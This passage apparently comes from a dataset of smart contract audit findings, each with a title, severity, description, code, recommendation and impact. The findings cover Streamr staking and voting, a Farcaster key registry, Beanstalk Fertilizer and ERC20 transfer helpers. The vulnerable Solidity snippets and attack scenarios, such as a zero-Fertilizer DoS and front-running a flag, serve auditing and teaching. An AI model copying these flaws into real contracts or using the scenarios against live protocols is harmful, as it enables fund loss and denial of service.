`bytes32()` instead. If all arguments are strings and or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\nчSee description.чч```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n -A removal signature might be applied to the wrong `fid`.чmediumчA remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. And the signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify a `fid` to remove and the below scenario would be possible.\\nAlice is an owner of `fid1` and she created a removal signature to remove a `key` but it's not used yet.\\nFor various reasons, she became an owner of `fid2`.\\n`fid2` has a `key` also but she doesn't want to remove it.\\nBut if anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, `KeyState` will be changed to `REMOVED` and anyone including the owner can't retrieve it.чThe removal signature should contain `fid` also to be invalidated for another `fid`.чA key remove signature might be used for an unexpected `fid`.ч```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n -`VoteKickPolicy._endVote()` might revert forever due to underflowчhighчIn `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18(3%), minimumStakeWei() = 1000 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99 = 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than total rewards(=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is possible only when there is a rounding during `minimumStakeWei` calculation. So it works properly with the default `slashingFraction = 10%`.чAlways round the `minimumStakeWei()` up.чThe `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.ч```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n -Possible overflow in `_payOutFirstInQueue`чhighчIn `_payOutFirstInQueue()`, possible revert during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\nчWe should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.чThe queue logic will be broken forever because `_payOutFirstInQueue()` keeps reverting.ч```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n -Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`чhighчIn `onUndelegate()`, it checks if the operator owner still holds at least `minimumSelfDelegationFraction` of total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), \"error_selfDelegationTooLow\");\\n }\\n```\\n\\nBut `amount` means the DATA token `amount` and `balanceOf(owner)` indicates the `Operator` token balance and it's impossible to compare them directly.ч`onUndelegate()` should compare amounts after converting to the same token.чThe operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.ч```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), \"error_selfDelegationTooLow\");\\n }\\n```\\n -Malicious target can make `_endVote()` revert forever by forceUnstaking/staking againчhighчIn `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.чPerform stake unlocks in `_endVote()` without relying on the current staking amounts.чMalicious operators can bypass the flagging system by reverting `_endVote()` forever.ч```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n -In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.чmediumч`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example,\\nAt the first time, `streamrConfig.minimumStakeWei()` = 100 and an operator(=target) has staked 100.\\n`streamrConfig.minimumStakeWei()` was increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because target has staked 100 only.\\nSo it will revert due to underflow during the reward distribution.ч`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.чOperators with small staked funds wouldn't be kicked forever.ч```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n -Possible front running of `flag()`чmediumчThe `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, \"error_cannotFlagSelf\");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], \"error_cannotFlagAgain\"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), \"error_notEnoughStake\");\\n require(stakedWei[target] > 0, \"error_flagTargetNotStaked\"); //@audit possible front run\\n```\\nчThere is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.чA malicious target would bypass the kick policy by front running.ч```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, \"error_cannotFlagSelf\");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], \"error_cannotFlagAgain\"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), \"error_notEnoughStake\");\\n require(stakedWei[target] > 0, \"error_flagTargetNotStaked\"); //@audit possible front run\\n```\\n -In `Operator._transfer()`, `onDelegate()` should be called after updating the token balancesчmediumчIn `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this \"delegation\"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before updating the token balances and the below scenario would be possible.\\nThe operator owner has 100 shares(required minimum fraction). And there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` will be 100 in `onDelegation()` and it will pass the requirement because it's called before `super._transfer()`.ч`onDelegate()` should be called after `super._transfer()`.чThe operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.ч```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this \"delegation\"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n -`onTokenTransfer` does not validate if the call is from the DATA token contractчmediumч`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\nчAdd a validation to ensure the caller is the actual DATA contract.чAttackers can prevent the deployment of `Operator` contracts.ч```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n -Insufficient validation of new Fertilizer IDs allow for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paidчmediumчA Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n );\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many Beans to add as LP\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be remove unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, \"Still active fertilizer\");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.чDespite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, bpf);\\n }\\n```\\nчIt is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep \"DOS last fertilizer payment through minting 0 fertilizers\"`ч```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n -Use safe transfer for ERC20 tokensчmediumчThe protocol intends to support all ERC20 tokens but the implementation uses the original transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom function return void instead of a success boolean. Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");\\n }\\n```\\nчWe recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.чTokens that do not correctly implement the EIP20 like USDT, will be unusable in the protocol as they revert the transaction because of the missing return value.ч```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");\\n }\\n```\\n -Fee-on-transfer tokens are not supportedчmediumчThe protocol intends to support all ERC20 tokens but does not support fee-on-transfer tokens. The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount. (Read here about fee-on-transfer tokens)\\nAlthough there are very few fee-on-transfer tokens, the protocol can't say it supports all ERC20 tokens if it doesn't support these weird ERC20 tokens.чThe transfer utility functions can be updated to return the actually received amount. Or clearly document that only standard ERC20 tokens are supported.чFee-on-transfer tokens can not be used for the protocol. Because of the rarity of these tokens, we evaluate this finding as a Medium risk.ч```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n -Centralization riskчmediumчThe protocol has an owner with privileged rights to perform admin tasks that can affect users. Especially, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, \"Fee percentage must be less than 1\");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\nчSpecify the owner's privileges and responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.чWhile the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results and users can be affected.ч```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, \"Fee percentage must be less than 1\");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n -Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`чlowчThe protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. (It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = 